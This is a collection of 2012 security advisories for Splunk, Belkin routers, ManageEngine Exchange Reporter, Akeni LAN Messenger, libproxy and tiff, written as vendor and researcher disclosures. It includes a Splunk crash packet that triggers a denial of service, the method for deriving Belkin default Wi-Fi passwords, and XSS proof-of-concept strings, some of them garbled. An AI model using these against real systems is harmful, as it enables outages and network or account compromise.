n.runs-SA-2012.004 - SPLUNK Unauthenticated remote DoS
n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2012.004 19-Nov-2012 Vendors:Splunk Inc., http://www.splunk.com Product:Splunk 4.0 - 4.3.4 Vulnerability: Unauthenticated remote denial of service against splunkd Tracking IDs: SPL-55521 Vendor communication: 2012/09/03 Reported the issue via Splunk's website 2012/09/04 Splunk responds and assigns tracking ID, plans fix for 4.3.5 2012/10/25 Splunk informs us that 5.0 will be available on November 1st and 4.3.5 on November 15th. Proposes to defer announcement of the vulnerability to ensure that people aren't forced to move to a new major release in order to mitigate. n.runs agrees. Overview: When a splunktcp-input (for use in Splunk-to-Splunk communication) is configured, an attacker can send an initial packet with a malformed '__s2s_capabilities' field. This leads to a crash of the splunkd daemon making the splunktcp-input unavailable. If the Splunk web-interface is running on the same host, it will be unavailable, too as it needs to communicate with splunkd. Description: An example packet looks like this (__s2s_capabilities is just 'A' here): "--splunk-cooked-mode-v3--\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0.\0\0\0\SOH\0\0\0\DC3__s2s_capabilities\0\0\0 \0\STXA\0\0\0\0\0\0\0\0\ENQ_raw\0" When this packet is sent multiple times, splunkd eventually crashes with a crash log similar to this one: [build 128297] 2012-08-30 13:34:01 Access violation, cannot read at address [0x6A62] Exception address: [0x6FC4500A] Crashing thread: TcpInputProcessor ContextFlags: [0x0001007F] Dr0: [0x] Dr1: [0x] Dr2: [0x] Dr3: [0x] Dr6: [0x] Dr7: [0x] SegGs: [0x] SegFs: [0x003B] SegEs: [0x0023] SegDs: [0x0023] Edi: [0x099F0020] Esi: [0x6A62] Ebx: [0x08BD5680] Edx: [0x0001] Ecx: [0x01734000] Eax: [0x05CD6A63] Ebp: [0x03B0F9C4] Eip: [0x6FC4500A] memcpy + 90/880 SegCs: [0x001B] EFlags: [0x00010212] Esp: [0x03B0F9BC] SegSs: [0x0023] OS: Windows Arch: i386 Backtrace: Frame 0 @[0x03B0F9C4]: [0x6FC80475] memcpy_s + 72/123 Frame 1 @[0x03B0F9E0]: [0x67DA1201] std::char_traits::_Copy_s + 21/29 Frame 2 @[0x03B0F9F8]: [0x67DA394D] std::basic_string, std::allocator>::assign + 126/146 Frame 3 @[0x03B0FA1C]: [0x67DA5E45] std::basic_string, std::allocator >::operator= + 13/16 Frame 4 @[0x05CD287C]: [0x6A62] ? Frame 5 @[0x0064656B]: (Frame below stack) Crash dump written to: C:\Program Files\Splunk\var\log\splunk\C__Program Files_Splunk_bin_splunkd_exe_crash-2012-08-30-13-34-01.dmp XXX /6.1 Service Pack 1 Threads running: 36 argv: [Splunkd -p 8089] terminating... Further analysis showed that the crash is indeed triggered by an incorrect source address in a fastcopy_I call. It is unclear where this address comes from, though and why the crash only happens after a certain amount of packets. Impact: Denial of service of splunkd (and possibly the Splunk web-interface, depending on configuration) until splunkd is restarted. Fixes: This issue has been fixed in Splunk 4.3.5 and 5.0. Credits: Alexander Klink, n.runs AG (discovery) Moritz Jodeit, n.runs AG (further analysis) References: This advisory and upcoming advisories: http://www.nruns.com/security_advisory.php About n.runs: n.runs AG is a vendor-independent consulting company specializing in the areas of: IT Infrastructure, IT Security and IT Business Consulting. Copyright Notice: Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in print
CVE-2012-4366: Insecure default WPA2 passphrase in multiple Belkin wireless routers
CVE-2012-4366: Insecure default WPA2 passphrase in multiple Belkin wireless routers I. Background Belkin ships many wireless routers with an encrypted wireless network configured by default. The network name (ESSID) and the (seemingly random) password is printed on a label at the bottom of the device. II. Description of vulnerability Having a preconfigured randomly generated WPA2-PSK passphrase for wireless routers is basically a good idea since a vendor-generated passphrase can be much more secure than most user-generated passwords. However, in the case of Belkin the default password is calculated solely based on the mac address of the device. Since the mac address is broadcasted with the beacon frames sent out by the device, a wireless attacker can calculate the default passphrase and then connect to the wireless network. Each of the eight characters of the default passphrase are created by substituting a corresponding hex-digit of the wan mac address using a static substitution table. Since the wan mac address is the wlan mac address + one or two (depending on the model), a wireless attacker can easily guess the wan mac address of the device and thus calculate the default WPA2 passphrase. Moreover, the default WPA2-PSK passphrase solely consists of 8 hexadecimal digits, which means that the entropy is limited to only 32 bits (or 33 bits since some models use uppercase hex digits). After sniffing one successful association of a client to the wireless network, an attacker can carry out an offline brute-force attack to crack the password. The program oclhashcat-plus can try 131,000 passwords per second on one high end GPU (AMD Radeon hd7970) [1]. Doing a full search of the 32-bit key space takes about 9 hours at this rate. III. Impact An attacker can exploit this vulnerability to calculate the WPA2-PSK passphrase of a wireless network. This allows sniffing and decrypting all wireless traffic in a purely passive attack given that the attacker has also sniffed the association. The attacker may also connect to the wireless network, which may allow further exploitation of unprotected systems in the local network. An attacker may furthermore use the wireless network to access the internet from the owner's network. The network owner may then be held responsible for any illegal activities perpetrated by the unauthorized users. IV. Affected devices Belkin Surf N150 Model F7D1301v1 The official Belkin support page [2] contains pictures of the label of several other WiFi devices, which show that the following devices are vulnerable as well: Belkin N900 Model F9K1104v1 Belkin N450 Model F9K1105V2 The following device uses a variation of the algorithm and the password consists of uppercase hex digits. When using our algorithm with the wlan mac of the device, the first 5 digits of the password are calculated correctly. It is likely that the algorithm differs only in the tables used. Belkin N300 Model F7D2301v1 It is likely that other Belkin devices are affected as well. Unfortunately, Belkin has not yet cooperated with us to fix the vulnerability and/or confirm a list of other affected devices. If you own a Belkin wireless router and want to know whether it is vulnerable as well, you should change the passphrase and then send me the relevant data (model number, wan/wlan mac address and original, default WPA2 passphrase). V. Solution Users of potentially affected wireless routers should change the wireless passphrase to something more secure. VI. Timeline 6.1.2012: Vendor contacted 27.1.2012: Escalated 29.10.2012: Another contact attempt, still no response 19.11.2012: Public disclosure VII. Credits Jakob Lell Jörg Schneider VIII. References Advisory location: http://www.jakoblell.com/blog/?p=15 CVE-2012-4366: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4366 [1] http://hashcat.net/oclhashcat-plus/ [2] http://en-us-support.belkin.com/app/answers/detail/a_id/6989
Manage Engine Exchange Reporter v4.1 - Multiple Web Vulnerabilites
Title: == Manage Engine Exchange Reporter v4.1 - Multiple Web Vulnerabilites Date: = 2012-11-14 References: === http://www.vulnerability-lab.com/get_content.php?id=688 VL-ID: = 688 Common Vulnerability Scoring System: 4.5 Introduction: = Microsoft Exchange Server is, by a distance, the most popular communication, collaboration and email messaging application today! MS Exchange serves as the hub of all email communications in most corporate environments that use the Microsoft Active Directory technology. It becomes a necessity to have an Exchange reporting tool that will equip and Exchange Administrator with precise, granular, comprehensive and actionable data on all aspects of the MS Exchange Server. Exchange Reporter Plus ManageEngine Exchange Reporter Plus is a web-based analysis and reporting solution for Microsoft Exchange Servers. Exchange Reporter Plus is a comprehensive and complete MS Exchange reporting software that provides over 70 different reports on every aspect of the Microsoft Exchange Server environment. The range includes reports of crucial importance. A few of the many vital Exchange tasks that can be performed using Exchange Reporter Plus are listed below. Track incoming and outgoing emails, monitor mailbox size and keep spam away from Active Directory mailboxes with Mailbox Traffic, Mailbox Content, and Mailbox Size Reports. Keep a tab on the number of messages sent and received by each Exchange server using Server Traffic Reports. Monitor the vital statistics of Exchange Server Public Folders with comprehensive Public Folder Reports. Generate reports on Distribution Lists and also show the traffic for each distribution by running Distribution Lists Traffic Report! Exchange Reporter Plus presents these reports in an easily comprehensible format, that even technically naive users will have no hassles in creating and interpreting them. In addition to generating these reports in the wink of an eye, also facilitates exporting these reports. The reports can be downloaded as xls, csv, pdf or html files for further activities. Curious to know more?? Try Exchange Reporter Plus hands-on in our Live Demo! (Copy of the Vendor Homepage: http://www.manageengine.com/products/exchange-reports/index.html ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in Exchange Reporter v4.1 Plus. Report-Timeline: 2012-08-26: Researcher Notification & Coordination 2012-08-27: Vendor Notification 1 2012-10-30: Vendor Notification 2 2012-11-07: Vendor Response/Feedback 2012-11-14: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: 1.1 A persistent input validation vulnerability is detected in Exchange Reporter Plus v4.1, a web-based analysis and reporting solution. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability is located in Schedule New Report module with the bound vulnerable Schedule Name Schedule Description parameters. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action & privileged user account. Vulnerable Module(s): [+] Schedule New Report Vulnerable Parameter(s): [+] Schedule Name [+] Schedule Description 1.2 Multiple non persistent cross site scripting vulnerability is detected in Exchange Reporter Plus v4.1, a web-based analysis and reporting solution. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action or local low privileged user account. The first vulnerability is located in ReportsIndex.do with the bound vulnerable reportCategoryID parameter. The second vulnerability is located in search box for reports. Successful exploitation can result in account steal, client site phishing & client-side content request manipulation. Vulnerable Module(s): [+] Reports Vulnerable File(s): [+] ReportsIndex.do Vulnerable Parameter(s): [+] reportCategoryID [+] search report Proof of Concept: = 1.1 The persistent input validation vulnerability can be exploited by remote attackers with low required user inter action & low privileged user account. For demonstration or reproduce ... The attacker schedules a new report and inserts in schedule name and schedule description his own malicious javascript or html code. Then inject the malicious script code i.e., When the user browses the alarms
Akeni LAN v1.2.118 - Filter Bypass Vulnerability (Local)
Title: == Akeni LAN v1.2.118 - Filter Bypass Vulnerability Date: = 2012-11-14 References: === http://www.vulnerability-lab.com/get_content.php?id=761 VL-ID: = 761 Common Vulnerability Scoring System: 3.3 Introduction: = Akeni LAN Messenger is an IM system designed for your LAN. It is easy to setup and does not requires a dedicated server or Internet connection. The rich client support chat, notification, conferencing, and file transfer. For those who also need authentication and encryption, please take a look at our Expert and Pro products. If your organization needs a web based solution that requires no client side installation of software, please take a look at our Web Chat. Due to the peer-to-peer nature of the product, there is no single point of failure and there is no need for any network setup. This make Akeni LAN Messenger a good solution for dynamic environment where two people can communicate with one another as long as the network itself is up and running. For example, LAN Messenger can be used by IT support personnel who needs a way to communicate and send files with each other anywhere in their network easily, without the need to connect to the Internet or to a centralized server. (Copy of the Vendor Website: http://www.akeni.com/en/product/lanmessenger.php ) Abstract: = The Vulnerability Laboratory Research Team discovered a filter bypass software vulnerability in the official Akeni LAN (LE) Messenger v1.2.118. Report-Timeline: 2012-11-14: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Local Severity: = Medium Details: A filter bypass software vulnerability is the detected in the official Akeni LAN (LE) Messenger v1.2.118. The bug allows local attackers to inject own malicious persistent script codes on application-side. The vulnerability is located in the Akeni `incorrect length` exception-handling module with the bound vulnerable groupname (Gruppenname) parameter. The filter of the Akeni LAN Messenger santizes malicious tags and evil frame context but does not recognize a secound splitted (%20) request after the first. The attacker can provoke a first parse by injecting for example a >`` to match the invalid exception criterias. After the provoke he splits the request with %20 and inject his own tags directly after it. The result is a persistent script code execution out of the invalid length & invalid parameter software exception-handling. Vulnerable Module(s): [+] Menu > Action > Contact List > Add Group Vulnerable Parameter(s): [+] Incorrect Length - Exception-Handling [+] Invalid Context - Exception-Handling Proof of Concept: = The vulnerability can be exploited by local attackers without required user inter action. For demonstration or reproduce ... 1. Let us watch the exception-handling of the invalid length. First we inject a standard iframe like >" [>"'>] has incorrect length. Groups name must have between %2 and %3 characters. ... the validation of the incorrect length or invalid parameter redisplays the message but parse the iframe tag. We can see in the parse the >" which is splitted from the parse itself and shows is there could be an injection possibility. 1.2 The next step will be to split the request. HOW?! We inject a standard iframe () split the request with %20 (Space) and inject the secound script code after the split. PoC: String: >"<%20>"http://www.vulnerability-lab.com/gfx/logo-header.png> --- Exception Logs (Bypass) --- [>""] has incorrect length. Groups name must have between 30 and %3 characters. Risk: = The security risk of the local persistent software vulnerability is estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com
[ MDVSA-2012:172 ] libproxy
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:172 http://www.mandriva.com/security/ ___ Package : libproxy Date: November 19, 2012 Affected: 2011. ___ Problem Description: A vulnerability has been discovered and corrected in libproxy: Stack-based buffer overflow in the url::get_pac function in url.cpp in libproxy 0.4.x before 0.4.9 allows remote servers to have an unspecified impact via a large proxy.pac file (CVE-2012-4504). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4504 ___ Updated Packages: Mandriva Linux 2011: 053f393f41f06748e2f73c457eccbbda 2011/i586/libmodman1-0.4.6-5.1-mdv2011.0.i586.rpm 0570ffcaa00cc5d74ace63f72748fc35 2011/i586/libproxy1-0.4.6-5.1-mdv2011.0.i586.rpm 9963a27b65ee3b523365df262ce37d61 2011/i586/libproxy-devel-0.4.6-5.1-mdv2011.0.i586.rpm c4f673f55bc291c815abc19eb93ce9e6 2011/i586/libproxy-gnome-0.4.6-5.1-mdv2011.0.i586.rpm 5998b76b5668477c4106567f6a0f4b3e 2011/i586/libproxy-kde-0.4.6-5.1-mdv2011.0.i586.rpm 3dbeeeaeffb63e6bcf4f8984b14ad98b 2011/i586/libproxy-networkmanager-0.4.6-5.1-mdv2011.0.i586.rpm 556864c55bb3297a8378ead688fb855d 2011/i586/libproxy-perl-0.4.6-5.1-mdv2011.0.i586.rpm fdd62ddf2738cb29786c2730a6a9ce71 2011/i586/libproxy-utils-0.4.6-5.1-mdv2011.0.i586.rpm 3ae77b40d10b4587607c9382bba36e34 2011/i586/python-libproxy-0.4.6-5.1-mdv2011.0.i586.rpm 3be5b56c72cd1bdeb319c18de9b87065 2011/SRPMS/libproxy-0.4.6-5.1.src.rpm Mandriva Linux 2011/X86_64: c1b3ac834e3f8d4de1af1ffb79342866 2011/x86_64/lib64modman1-0.4.6-5.1-mdv2011.0.x86_64.rpm 0a9ac3642bfd17a2ad49f4f3a90d229d 2011/x86_64/lib64proxy1-0.4.6-5.1-mdv2011.0.x86_64.rpm e72232c13ffef3dd379caa4cd5d95972 2011/x86_64/lib64proxy-devel-0.4.6-5.1-mdv2011.0.x86_64.rpm 2bc8ba94bbb7836a79f52d5761d36856 2011/x86_64/libproxy-gnome-0.4.6-5.1-mdv2011.0.x86_64.rpm d9ed4d40f5f78c805c575d766350b4d3 2011/x86_64/libproxy-kde-0.4.6-5.1-mdv2011.0.x86_64.rpm ca7d48a561ee234927a84bb1d8f5bab4 2011/x86_64/libproxy-networkmanager-0.4.6-5.1-mdv2011.0.x86_64.rpm ced3cccb8b08669300366317da1c35b7 2011/x86_64/libproxy-perl-0.4.6-5.1-mdv2011.0.x86_64.rpm b76e0c991fed23f263a499a05b5998d3 2011/x86_64/libproxy-utils-0.4.6-5.1-mdv2011.0.x86_64.rpm 606c638f4fed8ae4f3c63999b1986742 2011/x86_64/python-libproxy-0.4.6-5.1-mdv2011.0.x86_64.rpm 3be5b56c72cd1bdeb319c18de9b87065 2011/SRPMS/libproxy-0.4.6-5.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFQqfTdmqjQ0CJFipgRAuTSAKDURU4aES4zBlt/P3HbzpoD8x0TvACfbn7k reiNVHav8hpmPgCDa91c8rU= =zoc1 -END PGP SIGNATURE-
[SECURITY] [DSA 2575-1] tiff security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2575-1 secur...@debian.org http://www.debian.org/security/Nico Golde November 18, 2012 http://www.debian.org/security/faq - - Package: tiff Vulnerability : heap-based buffer overflow Problem type : local (remote) Debian-specific: no CVE ID : CVE-2012-4564 It was discovered that ppm2tiff of the tiff tools, a set of utilities for TIFF manipulation and conversion, is not properly checking the return value of an internal function used in order to detect integer overflows. As a consequence, ppm2tiff suffers of a heap-based buffer overflow. This allows attacker to potentially execute arbitrary code via a crafted ppm image, especially in scenarios in which images are automatically processed. For the stable distribution (squeeze), this problem has been fixed in version 3.9.4-5+squeeze7. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 4.0.2-5. We recommend that you upgrade your tiff packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlCo7w8ACgkQHYflSXNkfP9N0ACfb8Ir67FTGDXmQU4PbhcZibQW 3sQAn1Z96wdP8C5NeUYPrFfjFr7CRMCN =8y58 -END PGP SIGNATURE-
